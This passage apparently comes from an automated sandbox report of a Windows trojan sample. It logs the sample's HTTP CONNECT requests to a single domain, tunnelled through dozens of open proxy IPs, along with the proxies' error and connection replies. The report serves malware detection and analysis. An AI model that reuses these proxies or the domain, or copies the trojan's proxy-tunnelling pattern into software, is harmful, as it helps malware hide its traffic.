                                                                                Feb 23, 2024 14:28:30.382550001 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.382641077 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                327192.168.2.851126101.231.64.8984435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.269975901 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                328192.168.2.85114785.12.214.148805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.274249077 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                329192.168.2.85118798.188.47.13241455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.290050030 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                330192.168.2.851174187.40.1.1231285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.297848940 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.506841898 CET39INHTTP/1.1 200 Connection established
                                                                                Feb 23, 2024 14:29:10.495812893 CET1286INHTTP/1.1 500 Internal Server Error
                                                                                Server: squid/5.2
                                                                                Mime-Version: 1.0
                                                                                Date: Fri, 23 Feb 2024 13:29:02 GMT
                                                                                Content-Type: text/html;charset=utf-8
                                                                                Content-Length: 17038
                                                                                X-Squid-Error: ERR_CANNOT_FORWARD 0
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 39 66 39 66 39 20 21 69 6d 70 6f 72 74 61 6e 74 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 53 65 67 6f 65 2c 20 27 53 65 67 6f 65 20 55 49 27 2c 20 27 44 65 6a 61 56 75 20 53 61 6e 73 27 2c 20 27 54 72 65 62 75 63 68 65 74 20 4d 53 27 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 41 76 69 73 6f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 27 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 3e 0a 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 63 37 63 61 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 20 21 69 6d 70 6f 72 74 61 6e 74 3b 68 65 69 67 68 74 3a 20 31 30 30 25 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 72 65 74 69 63 65 6e 63 69 61 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 20 65 6c 6c 69 70 73 69 73 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 39 36 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 43 41 4e 4e 4f 54 5f 46 4f 52 57 41 52 44 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 20 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 20 73 74 79 6c 65 3d 22 6d 69 6e 2d 77 69 64 74 68 3a 35 30 30 70 78 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 38 22 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 35 30 70 78 3b 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 22 3e 0a 3c 69 6d 67 20 63 6c 61 73 73 3d 22 64 65 6e 79 5f 6c 6f 67 6f 22 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 4e 63 41 41 41 41 76 43 41 59 41 41 41 42
                                                                                Data Ascii: <!DOCTYPE html><html style="background-color: #f9f9f9 !important;font-family:Segoe, 'Segoe UI', 'DejaVu Sans', 'Trebuchet MS', Verdana, sans-serif;"> <head> <meta charset="UTF-8"> <title>Aviso</title> <meta content='width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no' name='viewport'> <style> html{background: #3c7ca0 !important;} body{background: transparent !important;height: 100%;} .reticencias { text-overflow: ellipsis; white-space: nowrap; overflow: hidden; width:96%; margin-bottom:0 !important; } </style> </head> <body id="ERR_CANNOT_FORWARD" style="font-size:12px; "> <div class="container" align="center"> <div class="row" style="min-width:500px"> <div class="col-xs-8" style="text-align:center;padding-top:50px; padding-bottom:10px"><img class="deny_logo" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAANcAAAAvCAYAAAB


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                331192.168.2.851145211.222.252.18781935828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.302315950 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                332192.168.2.851248104.21.218.103805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.305048943 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.395463943 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:24 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                333192.168.2.850543208.109.13.93278775828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.306313992 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.392900944 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.398206949 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.398343086 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:48.398121119 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:00.397906065 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:12.429121971 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                334192.168.2.85119994.23.83.53316335828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.311475039 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.741600037 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.210475922 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.195226908 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                335192.168.2.85125423.227.38.230805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.314939022 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.402477026 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:24 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                336192.168.2.851257185.162.229.112805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.316214085 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.403928995 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:24 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                337192.168.2.851270104.17.239.10805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.321610928 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.409013987 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:24 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                338192.168.2.851271172.67.181.129805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.323132992 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.414175987 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:24 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                339192.168.2.85068272.195.101.9941455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.323295116 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                340192.168.2.85069772.195.34.4241455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.340975046 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                341192.168.2.851127221.230.7.3990005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.344214916 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                342192.168.2.851287104.27.37.131805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.344953060 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.432358980 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:24 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                343192.168.2.851283104.19.124.112805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.345000029 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.433079958 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:24 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                344192.168.2.851224184.181.217.21341455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.346110106 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                345192.168.2.851190167.86.69.142468595828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.346370935 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                346192.168.2.851293167.99.233.16480005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.347346067 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                347192.168.2.851249104.238.111.10777575828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.371692896 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.788487911 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.352927923 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.398086071 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.288706064 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                348192.168.2.851235174.75.211.22241455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.371851921 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                349192.168.2.85117579.132.192.1331285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.372697115 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.724867105 CET84INHTTP/1.0 200 Connection established
                                                                                Proxy-agent: Kerio Control/9.4.3 build 8353


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                350192.168.2.851339172.67.206.105805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.374475956 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
